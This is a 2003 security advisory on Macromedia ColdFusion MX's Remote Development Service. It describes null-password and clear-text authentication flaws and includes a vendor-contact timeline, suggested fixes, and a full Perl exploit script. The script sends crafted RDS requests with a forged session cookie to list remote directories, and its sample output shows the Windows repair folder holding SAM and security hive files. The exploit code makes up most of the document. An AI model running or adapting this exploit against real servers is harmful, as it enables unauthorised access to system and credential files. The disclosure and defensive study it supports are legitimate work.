- -- ------------------------- -- - [>(] AngryPacket Security Advisory [>(] - -- ------------------------- -- - +--------------------- -- - + advisory information +------------------ -- - Exploit Code: Victim1 Initial Bug Report By: rs2112 release date: 06/26/2003 +------------------- -- - + timeline of Vendor Notification +------------------- -- - 1: Initial Email - Remote RDS problem and sample runtime exploit code -> Sun Jun 29 18:30:21 CDT 2003 1a: Status: (mon) No Response 2: Call Macromedia - Get treated like a peckerhead and no one cares.. . -> Monday 4:00pm cali time -> Email: PR -> 4:30 pm cali time. 2a: Next day ( tues ).. .. No one responds.. .. Oh well Post code. +-------------------- -- - + product information +----------------- -- - software: Cold Fusion server vendor: Macromedia homepage: http://www.macromedia.com description: With ColdFusion MX, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP. Now available in versions that support industry leading J2EE application servers, ColdFusion MX enables web application developers to easily harness the power of the Java platform. +---------------------- -- - + vulnerability details +------------------- -- - problem1: Default Remote Development Service (RDS) configuration.( read, write, retrieve ) problem2: ASP SESSION ID's are not validated. affected: Cold Fusion Server MX explaination: ColdFusion RDS allows developers to securely access remote files and data sources, and debug CFML code. Developers can use RDS through ColdFusion Studio, Homesite+, and Dreamweaver MX to access files and databases on a remote ColdFusion development server using HTTP. Under CF 4.5/5, RDS ran as a service; under CFMX, RDS is a JAVA servlet that runs under the context of the CF Application service account. In both cases, by default, RDS has LocalSystem authority to the box. When properly configured, RDS requires a (static) password to authenticate the remote developer. The first vulnerability (1) is that, due to this level of access, a remote user can reconfigure their website properties to access (put and get) any file on the CF server. The second vulnerability (2) is that, by default, RDS does not require a password for authentication (null password). Therefore, anyone with a RDS compatible development application, can attach to a CF server running RDS, authenticate with a blank password, and own the box. The third vulnerability (3) is that when the RDS password is set, it is sent over the wire in clear text. risk: High status: Awaiting vendor response. ( Read Timeline: Above ) exploit: As a proof of concept, victim1 has developed beta code that can be used to exploit the RDS password vulnerability. The code demonstrates that fact that it would be a trivial task to scan the Internet, determine which servers are running CF, and compromise the box. fix: Vulnerability 1 - use a dedicated service account with restricted access to the server. Vulnerability 2 - set the d*mn password Vulnerability 3 - ASP SESSION ID not validated. Vulnerability 4 - ?? +-------- -- - + credits +----- -- - Vulnerability reported by rs2112. Exploit code developed by Victim1 of AngryPacket Security group. +-------------- + exploit: +------------- #!/usr/bin/perl # RDS_c_Dump.pl # victim1@angrypacket.com ## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN, # I or rs2112 take no responsibilty for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against # attack and thats it. ## CF 6 MX Server does several things in order to get remote dir structure so we will need # to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection just FYI, # in like one full HTTP1/1 session witin netcat. # # I would like to point out that the ASPSESSID never validates so you can change this on the fly. # # Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and # they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response. # # You can Write as well, I have tested and this works fine. If you change the file to and *.exe it will attempt to become and # 16bit dos application on the remote box FYI. # # Requests are sent in this order to get a remote dir structure: # NOTE: Create dir retrieval array. # # ANOTHER NOTE: # Due to certian current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code, # If you email me I will not send it to you, so basically dont bother. # # Im sorry for being such a foil fart but hey, you understand im shure. # # Sample output: # -------------------------------- # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl # # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1 # # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: # Content-Length: 37 # Please wait.. .. # HTTP/1.1 100 Continue # Server: Microsoft-IIS/5.0 # Date: Tue, 01 Jul 2003 10:30:43 GMT # # HTTP/1.1 200 OK # Server: Microsoft-IIS/5.0 # Date: Tue, 01 Jul 2003 10:30:43 GMT # Connection: close # Content-Type: text/html # # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3: # sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8: # software1:67:65331203:0,02:F:6:system1:66:9748483:0,0 # Vic7im1@cipher:~/Scripts/RDS_Sploit$ # ---------------------------------- use strict; use IO::Socket; use vars qw($response @clength @rarray); ## Dreamweaver string requests to ide.cfm ## -------------------------------------- #1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28 #3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47 #4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32 #6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50 #7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51 #9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24 #11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53 #13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53 #15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51 #17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29 #19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37 # Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know # the $string_val. @clength = ( "Content-Length: 46", "Content-Length: 28", "Content-Length: 47", "Content-Length: 46", #"Content-Length: 32", #"Content-Length: 50", "Content-Length: 46", "Content-Length: 51", "Content-Length: 46", "Content-Length: 24", "Content-Length: 46", "Content-Length: 53", "Content-Length: 46", "Content-Length: 53", "Content-Length: 46", "Content-Length: 51", "Content-Length: 46", "Content-Length: 29", "Content-Length: 46", "Content-Length: 37" ); @rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:7:C:/_mm/STR:1:*STR:0:", "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", #"3:STR:10:C:/_notes/STR:1:*STR:0:", #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:3:C:/STR:1:*STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:" ); system("clear"); # change target addy below. my $TARGET = "192.168.0.100"; my $PORT = "80"; my $STRING = "C:/WINNT/repair"; my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n"; print "Generating Socket with Array Directory Values.\n"; my ( $i, $c); for ( $i = 0; $i < @rarray; $i++ ) { for ( $c = 0; $c < @clength; $c++ ) { if( $i == $c ) { &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]); } } } sub gen_sock() { my $sock = new IO::Socket::INET(PeerAddr => $TARGET, PeerPort => $PORT, Proto => 'tcp', ); die "Socket Could not be established ! $!" unless $sock; print "Target: $TARGET:$PORT\n"; print "$POST\n"; print "Request String Value: $rarray[$i]\n"; print "$clength[$c]\n"; print "Please wait.. ..\n"; print $sock "$POST"; print $sock "Content-Type: application/x-ColdFusionIDE\r\n"; print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n"; print $sock "Host: $TARGET\r\n"; print $sock "$clength[$c]\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n"; print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n"; print $sock "\r\n"; print $sock "$rarray[$i]"; # lets return and print data to term while($response = <$sock>) { chomp($response); print "$response\n"; } close($sock); } +----------- -- - + disclaimer +-------- -- - READ IN THE SCRIPT. Oh and Happy 4th of July ! - -- ------------------------- #EOT